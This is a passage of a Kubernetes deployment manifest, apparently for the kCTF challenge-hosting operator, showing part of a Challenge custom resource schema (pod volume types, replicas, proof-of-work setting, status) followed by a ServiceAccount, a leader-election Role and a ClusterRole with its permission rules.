type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + required: + - path + type: object + type: array + type: object + emptyDir: + description: 'EmptyDir represents a temporary directory that shares a pod''s lifetime. More info: https://kubernetes.io/docs/concepts/storage/volumes#emptydir' + properties: + medium: + description: 'What type of storage medium should back this directory. The default is "" which means to use the node''s default medium. Must be an empty string (default) or Memory. More info: https://kubernetes.io/docs/concepts/storage/volumes#emptydir' + type: string + sizeLimit: + anyOf: + - type: integer + - type: string + description: 'Total amount of local storage required for this EmptyDir volume. The size limit is also applicable for memory medium. The maximum usage on memory medium EmptyDir would be the minimum value between the SizeLimit specified here and the sum of memory limits of all containers in a pod. The default is nil which means that the limit is undefined. More info: http://kubernetes.io/docs/user-guide/volumes#emptydir' + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + type: object + ephemeral: + description: "Ephemeral represents a volume that is handled by a cluster storage driver. The volume's lifecycle is tied to the pod that defines it - it will be created before the pod starts, and deleted when the pod is removed. \n Use this if: a) the volume is only needed while the pod runs, b) features of normal volumes like restoring from snapshot or capacity tracking are needed, c) the storage driver is specified through a storage class, and d) the storage driver supports dynamic volume provisioning through a PersistentVolumeClaim (see EphemeralVolumeSource for more information on the connection between this volume type and PersistentVolumeClaim). \n Use PersistentVolumeClaim or one of the vendor-specific APIs for volumes that persist for longer than the lifecycle of an individual pod. \n Use CSI for light-weight local ephemeral volumes if the CSI driver is meant to be used that way - see the documentation of the driver for more information. \n A pod can use both types of ephemeral volumes and persistent volumes at the same time. \n This is a beta feature and only available when the GenericEphemeralVolume feature gate is enabled." + properties: + volumeClaimTemplate: + description: "Will be used to create a stand-alone PVC to provision the volume. The pod in which this EphemeralVolumeSource is embedded will be the owner of the PVC, i.e. the PVC will be deleted together with the pod. The name of the PVC will be `-` where `` is the name from the `PodSpec.Volumes` array entry. Pod validation will reject the pod if the concatenated name is not valid for a PVC (for example, too long). \n An existing PVC with that name that is not owned by the pod will *not* be used for the pod to avoid using an unrelated volume by mistake. Starting the pod is then blocked until the unrelated PVC is removed. If such a pre-created PVC is meant to be used by the pod, the PVC has to updated with an owner reference to the pod once the pod exists. Normally this should not be necessary, but it may be useful when manually reconstructing a broken cluster. \n This field is read-only and no changes will be made by Kubernetes to the PVC after it has been created. \n Required, must not be nil." + properties: + metadata: + description: May contain labels and annotations that will be copied into the PVC when creating it. No other fields are allowed and will be rejected during validation. + type: object + spec: + description: The specification for the PersistentVolumeClaim. The entire content is copied unchanged into the PVC that gets created from this template. The same fields as in a PersistentVolumeClaim are also valid here. + properties: + accessModes: + description: 'AccessModes contains the desired access modes the volume should have. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#access-modes-1' + items: + type: string + type: array + dataSource: + description: 'This field can be used to specify either: * An existing VolumeSnapshot object (snapshot.storage.k8s.io/VolumeSnapshot) * An existing PVC (PersistentVolumeClaim) If the provisioner or an external controller can support the specified data source, it will create a new volume based on the contents of the specified data source. If the AnyVolumeDataSource feature gate is enabled, this field will always have the same contents as the DataSourceRef field.' + properties: + apiGroup: + description: APIGroup is the group for the resource being referenced. If APIGroup is not specified, the specified Kind must be in the core API group. For any other third-party types, APIGroup is required. + type: string + kind: + description: Kind is the type of resource being referenced + type: string + name: + description: Name is the name of resource being referenced + type: string + required: + - kind + - name + type: object + dataSourceRef: + description: 'Specifies the object from which to populate the volume with data, if a non-empty volume is desired. This may be any local object from a non-empty API group (non core object) or a PersistentVolumeClaim object. When this field is specified, volume binding will only succeed if the type of the specified object matches some installed volume populator or dynamic provisioner. This field will replace the functionality of the DataSource field and as such if both fields are non-empty, they must have the same value. For backwards compatibility, both fields (DataSource and DataSourceRef) will be set to the same value automatically if one of them is empty and the other is non-empty. There are two important differences between DataSource and DataSourceRef: * While DataSource only allows two specific types of objects, DataSourceRef allows any non-core object, as well as PersistentVolumeClaim objects. * While DataSource ignores disallowed values (dropping them), DataSourceRef preserves all values, and generates an error if a disallowed value is specified. (Alpha) Using this field requires the AnyVolumeDataSource feature gate to be enabled.' + properties: + apiGroup: + description: APIGroup is the group for the resource being referenced. If APIGroup is not specified, the specified Kind must be in the core API group. For any other third-party types, APIGroup is required. + type: string + kind: + description: Kind is the type of resource being referenced + type: string + name: + description: Name is the name of resource being referenced + type: string + required: + - kind + - name + type: object + resources: + description: 'Resources represents the minimum resources the volume should have. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#resources' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum amount of compute resources required. If Requests is omitted for a container, it defaults to Limits if that is explicitly specified, otherwise to an implementation-defined value. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + selector: + description: A label query over volumes to consider for binding. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + storageClassName: + description: 'Name of the StorageClass required by the claim. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#class-1' + type: string + volumeMode: + description: volumeMode defines what type of volume is required by the claim. Value of Filesystem is implied when not included in claim spec. + type: string + volumeName: + description: VolumeName is the binding reference to the PersistentVolume backing this claim. + type: string + type: object + required: + - spec + type: object + type: object + fc: + description: FC represents a Fibre Channel resource that is attached to a kubelet's host machine and then exposed to the pod. + properties: + fsType: + description: 'Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + lun: + description: 'Optional: FC target lun number' + format: int32 + type: integer + readOnly: + description: 'Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.' + type: boolean + targetWWNs: + description: 'Optional: FC target worldwide names (WWNs)' + items: + type: string + type: array + wwids: + description: 'Optional: FC volume world wide identifiers (wwids) Either wwids or combination of targetWWNs and lun must be set, but not both simultaneously.' + items: + type: string + type: array + type: object + flexVolume: + description: FlexVolume represents a generic volume resource that is provisioned/attached using an exec based plugin. + properties: + driver: + description: Driver is the name of the driver to use for this volume. + type: string + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". The default filesystem depends on FlexVolume script. + type: string + options: + additionalProperties: + type: string + description: 'Optional: Extra command options if any.' + type: object + readOnly: + description: 'Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.' + type: boolean + secretRef: + description: 'Optional: SecretRef is reference to the secret object containing sensitive information to pass to the plugin scripts. This may be empty if no secret object is specified. If the secret object contains more than one secret, all secrets are passed to the plugin scripts.' + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + required: + - driver + type: object + flocker: + description: Flocker represents a Flocker volume attached to a kubelet's host machine. This depends on the Flocker control service being running + properties: + datasetName: + description: Name of the dataset stored as metadata -> name on the dataset for Flocker should be considered as deprecated + type: string + datasetUUID: + description: UUID of the dataset. This is unique identifier of a Flocker dataset + type: string + type: object + gcePersistentDisk: + description: 'GCEPersistentDisk represents a GCE Disk resource that is attached to a kubelet''s host machine and then exposed to the pod. More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + properties: + fsType: + description: 'Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + partition: + description: 'The partition in the volume that you want to mount. If omitted, the default is to mount by volume name. Examples: For volume /dev/sda1, you specify the partition as "1". Similarly, the volume partition for /dev/sda is "0" (or you can leave the property empty). More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + format: int32 + type: integer + pdName: + description: 'Unique name of the PD resource in GCE. Used to identify the disk in GCE. More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + type: string + readOnly: + description: 'ReadOnly here will force the ReadOnly setting in VolumeMounts. Defaults to false. More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + type: boolean + required: + - pdName + type: object + gitRepo: + description: 'GitRepo represents a git repository at a particular revision. DEPRECATED: GitRepo is deprecated. To provision a container with a git repo, mount an EmptyDir into an InitContainer that clones the repo using git, then mount the EmptyDir into the Pod''s container.' + properties: + directory: + description: Target directory name. Must not contain or start with '..'. If '.' is supplied, the volume directory will be the git repository. Otherwise, if specified, the volume will contain the git repository in the subdirectory with the given name. + type: string + repository: + description: Repository URL + type: string + revision: + description: Commit hash for the specified revision. + type: string + required: + - repository + type: object + glusterfs: + description: 'Glusterfs represents a Glusterfs mount on the host that shares a pod''s lifetime. More info: https://examples.k8s.io/volumes/glusterfs/README.md' + properties: + endpoints: + description: 'EndpointsName is the endpoint name that details Glusterfs topology. More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: string + path: + description: 'Path is the Glusterfs volume path. More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: string + readOnly: + description: 'ReadOnly here will force the Glusterfs volume to be mounted with read-only permissions. Defaults to false. More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: boolean + required: + - endpoints + - path + type: object + hostPath: + description: 'HostPath represents a pre-existing file or directory on the host machine that is directly exposed to the container. This is generally used for system agents or other privileged things that are allowed to see the host machine. Most containers will NOT need this. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath --- TODO(jonesdl) We need to restrict who can use host directory mounts and who can/can not mount host directories as read/write.' + properties: + path: + description: 'Path of the directory on the host. If the path is a symlink, it will follow the link to the real path. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath' + type: string + type: + description: 'Type for HostPath Volume Defaults to "" More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath' + type: string + required: + - path + type: object + iscsi: + description: 'ISCSI represents an ISCSI Disk resource that is attached to a kubelet''s host machine and then exposed to the pod. More info: https://examples.k8s.io/volumes/iscsi/README.md' + properties: + chapAuthDiscovery: + description: whether support iSCSI Discovery CHAP authentication + type: boolean + chapAuthSession: + description: whether support iSCSI Session CHAP authentication + type: boolean + fsType: + description: 'Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#iscsi TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + initiatorName: + description: Custom iSCSI Initiator Name. If initiatorName is specified with iscsiInterface simultaneously, new iSCSI interface : will be created for the connection. + type: string + iqn: + description: Target iSCSI Qualified Name. + type: string + iscsiInterface: + description: iSCSI Interface Name that uses an iSCSI transport. Defaults to 'default' (tcp). + type: string + lun: + description: iSCSI Target Lun number. + format: int32 + type: integer + portals: + description: iSCSI Target Portal List. The portal is either an IP or ip_addr:port if the port is other than default (typically TCP ports 860 and 3260). + items: + type: string + type: array + readOnly: + description: ReadOnly here will force the ReadOnly setting in VolumeMounts. Defaults to false. + type: boolean + secretRef: + description: CHAP Secret for iSCSI target and initiator authentication + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + targetPortal: + description: iSCSI Target Portal. The Portal is either an IP or ip_addr:port if the port is other than default (typically TCP ports 860 and 3260). + type: string + required: + - iqn + - lun + - targetPortal + type: object + name: + description: 'Volume''s name. Must be a DNS_LABEL and unique within the pod. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names' + type: string + nfs: + description: 'NFS represents an NFS mount on the host that shares a pod''s lifetime More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + properties: + path: + description: 'Path that is exported by the NFS server. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: string + readOnly: + description: 'ReadOnly here will force the NFS export to be mounted with read-only permissions. Defaults to false. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: boolean + server: + description: 'Server is the hostname or IP address of the NFS server. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: string + required: + - path + - server + type: object + persistentVolumeClaim: + description: 'PersistentVolumeClaimVolumeSource represents a reference to a PersistentVolumeClaim in the same namespace. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#persistentvolumeclaims' + properties: + claimName: + description: 'ClaimName is the name of a PersistentVolumeClaim in the same namespace as the pod using this volume. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#persistentvolumeclaims' + type: string + readOnly: + description: Will force the ReadOnly setting in VolumeMounts. Default false. + type: boolean + required: + - claimName + type: object + photonPersistentDisk: + description: PhotonPersistentDisk represents a PhotonController persistent disk attached and mounted on kubelets host machine + properties: + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. + type: string + pdID: + description: ID that identifies Photon Controller persistent disk + type: string + required: + - pdID + type: object + portworxVolume: + description: PortworxVolume represents a portworx volume attached and mounted on kubelets host machine + properties: + fsType: + description: FSType represents the filesystem type to mount Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs". Implicitly inferred to be "ext4" if unspecified. + type: string + readOnly: + description: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. + type: boolean + volumeID: + description: VolumeID uniquely identifies a Portworx volume + type: string + required: + - volumeID + type: object + projected: + description: Items for all in one resources secrets, configmaps, and downward API + properties: + defaultMode: + description: Mode bits used to set permissions on created files by default. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. Directories within the path are not affected by this setting. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set. + format: int32 + type: integer + sources: + description: list of volume projections + items: + description: Projection that may be projected along with other supported volume types + properties: + configMap: + description: information about the configMap data to project + properties: + items: + description: If unspecified, each key-value pair in the Data field of the referenced ConfigMap will be projected into the volume as a file whose name is the key and content is the value. If specified, the listed keys will be projected into the specified paths, and unlisted keys will not be present. If a key is specified which is not present in the ConfigMap, the volume setup will error unless it is marked optional. Paths must be relative and may not contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used to set permissions on this file. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path of the file to map the key to. May not be an absolute path. May not contain the path element '..'. May not start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its keys must be defined + type: boolean + type: object + downwardAPI: + description: information about the downwardAPI data to project + properties: + items: + description: Items is a list of DownwardAPIVolume file + items: + description: DownwardAPIVolumeFile represents information to create the file containing the pod field + properties: + fieldRef: + description: 'Required: Selects a field of the pod: only annotations, labels, name and namespace are supported.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. + type: string + required: + - fieldPath + type: object + mode: + description: 'Optional: mode bits used to set permissions on this file, must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: 'Required: Path is the relative path name of the file to be created. Must not be absolute or contain the ''..'' path. Must be utf-8 encoded. The first item of the relative path must not start with ''..''' + type: string + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, requests.cpu and requests.memory) are currently supported.' + properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + required: + - path + type: object + type: array + type: object + secret: + description: information about the secret data to project + properties: + items: + description: If unspecified, each key-value pair in the Data field of the referenced Secret will be projected into the volume as a file whose name is the key and content is the value. If specified, the listed keys will be projected into the specified paths, and unlisted keys will not be present. If a key is specified which is not present in the Secret, the volume setup will error unless it is marked optional. Paths must be relative and may not contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used to set permissions on this file. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path of the file to map the key to. May not be an absolute path. May not contain the path element '..'. May not start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret or its key must be defined + type: boolean + type: object + serviceAccountToken: + description: information about the serviceAccountToken data to project + properties: + audience: + description: Audience is the intended audience of the token. A recipient of a token must identify itself with an identifier specified in the audience of the token, and otherwise should reject the token. The audience defaults to the identifier of the apiserver. + type: string + expirationSeconds: + description: ExpirationSeconds is the requested duration of validity of the service account token. As the token approaches expiration, the kubelet volume plugin will proactively rotate the service account token. The kubelet will start trying to rotate the token if the token is older than 80 percent of its time to live or if the token is older than 24 hours.Defaults to 1 hour and must be at least 10 minutes. + format: int64 + type: integer + path: + description: Path is the path relative to the mount point of the file to project the token into. + type: string + required: + - path + type: object + type: object + type: array + type: object + quobyte: + description: Quobyte represents a Quobyte mount on the host that shares a pod's lifetime + properties: + group: + description: Group to map volume access to Default is no group + type: string + readOnly: + description: ReadOnly here will force the Quobyte volume to be mounted with read-only permissions. Defaults to false. + type: boolean + registry: + description: Registry represents a single or multiple Quobyte Registry services specified as a string as host:port pair (multiple entries are separated with commas) which acts as the central registry for volumes + type: string + tenant: + description: Tenant owning the given Quobyte volume in the Backend Used with dynamically provisioned Quobyte volumes, value is set by the plugin + type: string + user: + description: User to map volume access to Defaults to serivceaccount user + type: string + volume: + description: Volume is a string that references an already created Quobyte volume by name. + type: string + required: + - registry + - volume + type: object + rbd: + description: 'RBD represents a Rados Block Device mount on the host that shares a pod''s lifetime. More info: https://examples.k8s.io/volumes/rbd/README.md' + properties: + fsType: + description: 'Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#rbd TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + image: + description: 'The rados image name. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + keyring: + description: 'Keyring is the path to key ring for RBDUser. Default is /etc/ceph/keyring. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + monitors: + description: 'A collection of Ceph monitors. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + items: + type: string + type: array + pool: + description: 'The rados pool name. Default is rbd. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + readOnly: + description: 'ReadOnly here will force the ReadOnly setting in VolumeMounts. Defaults to false. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: boolean + secretRef: + description: 'SecretRef is name of the authentication secret for RBDUser. If provided overrides keyring. Default is nil. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + user: + description: 'The rados user name. Default is admin. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + required: + - image + - monitors + type: object + scaleIO: + description: ScaleIO represents a ScaleIO persistent volume attached and mounted on Kubernetes nodes. + properties: + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Default is "xfs". + type: string + gateway: + description: The host address of the ScaleIO API Gateway. + type: string + protectionDomain: + description: The name of the ScaleIO Protection Domain for the configured storage. + type: string + readOnly: + description: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. + type: boolean + secretRef: + description: SecretRef references to the secret for ScaleIO user and other sensitive information. If this is not provided, Login operation will fail. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + sslEnabled: + description: Flag to enable/disable SSL communication with Gateway, default false + type: boolean + storageMode: + description: Indicates whether the storage for a volume should be ThickProvisioned or ThinProvisioned. Default is ThinProvisioned. + type: string + storagePool: + description: The ScaleIO Storage Pool associated with the protection domain. + type: string + system: + description: The name of the storage system as configured in ScaleIO. + type: string + volumeName: + description: The name of a volume already created in the ScaleIO system that is associated with this volume source. + type: string + required: + - gateway + - secretRef + - system + type: object + secret: + description: 'Secret represents a secret that should populate this volume. More info: https://kubernetes.io/docs/concepts/storage/volumes#secret' + properties: + defaultMode: + description: 'Optional: mode bits used to set permissions on created files by default. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. Defaults to 0644. Directories within the path are not affected by this setting. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + items: + description: If unspecified, each key-value pair in the Data field of the referenced Secret will be projected into the volume as a file whose name is the key and content is the value. If specified, the listed keys will be projected into the specified paths, and unlisted keys will not be present. If a key is specified which is not present in the Secret, the volume setup will error unless it is marked optional. Paths must be relative and may not contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used to set permissions on this file. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path of the file to map the key to. May not be an absolute path. May not contain the path element '..'. May not start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + optional: + description: Specify whether the Secret or its keys must be defined + type: boolean + secretName: + description: 'Name of the secret in the pod''s namespace to use. More info: https://kubernetes.io/docs/concepts/storage/volumes#secret' + type: string + type: object + storageos: + description: StorageOS represents a StorageOS volume attached and mounted on Kubernetes nodes. + properties: + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. + type: string + readOnly: + description: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. + type: boolean + secretRef: + description: SecretRef specifies the secret to use for obtaining the StorageOS API credentials. If not specified, default values will be attempted. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + volumeName: + description: VolumeName is the human-readable name of the StorageOS volume. Volume names are only unique within a namespace. + type: string + volumeNamespace: + description: VolumeNamespace specifies the scope of the volume within StorageOS. If no namespace is specified then the Pod's namespace will be used. This allows the Kubernetes name scoping to be mirrored within StorageOS for tighter integration. Set VolumeName to any name to override the default behaviour. Set to "default" if you are not using namespaces within StorageOS. Namespaces that do not pre-exist within StorageOS will be created. + type: string + type: object + vsphereVolume: + description: VsphereVolume represents a vSphere volume attached and mounted on kubelets host machine + properties: + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. + type: string + storagePolicyID: + description: Storage Policy Based Management (SPBM) profile ID associated with the StoragePolicyName. + type: string + storagePolicyName: + description: Storage Policy Based Management (SPBM) profile name. + type: string + volumePath: + description: Path that identifies vSphere volume vmdk + type: string + required: + - volumePath + type: object + required: + - name + type: object + type: array + required: + - containers + type: object + type: object + type: object + powDifficultySeconds: + default: 0 + description: The quantity of seconds of the proof of work + type: integer + replicas: + default: 1 + description: The desired quantity of replicas if horizontal pod autoscaler is disabled + format: int32 + type: integer + required: + - image + type: object + status: + description: ChallengeStatus defines the observed state of Challenge + properties: + health: + default: disabled + description: Shows healthcheck returns + type: string + status: + default: up-to-date + description: 'Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html Says if the challenge is up to date or being updated' + type: string + required: + - health + - status + type: object + type: object + served: true + storage: true + subresources: + status: {} +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: kctf-operator-controller-manager + namespace: kctf-operator-system +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: kctf-operator-leader-election-role + namespace: kctf-operator-system +rules: +- apiGroups: + - "" + resources: + - configmaps + verbs: + - get + - list + - watch + - create + - update + - patch + - delete +- apiGroups: + - coordination.k8s.io + resources: + - leases + verbs: + - get + - list + - watch + - create + - update + - patch + - delete +- apiGroups: + - "" + resources: + - events + verbs: + - create + - patch +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + creationTimestamp: null + name: kctf-operator-manager-role +rules: +- apiGroups: + - apps + resources: + - daemonsets + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - apps + resources: + - deployments + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - autoscaling + resources: + - horizontalpodautoscalers + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - cloud.google.com + resources: + - backendconfigs + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - configmaps + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - endpoints + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - nodes + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - persistentvolumeclaims + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - persistentvolumes + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - pods + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - secrets + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - services + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - extensions + resources: + - ingresses + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - kctf.dev + resources: + - challenges + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - kctf.dev + resources: + - challenges/finalizers + verbs: + - update +- apiGroups: + - kctf.dev + resources: + - challenges/status + verbs: + - get + - patch + - update +- apiGroups: + - networking.gke.io + resources: + - managedcertificates + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - networking.k8s.io + resources: + - ingresses + verbs: + - create + - delete + - get + 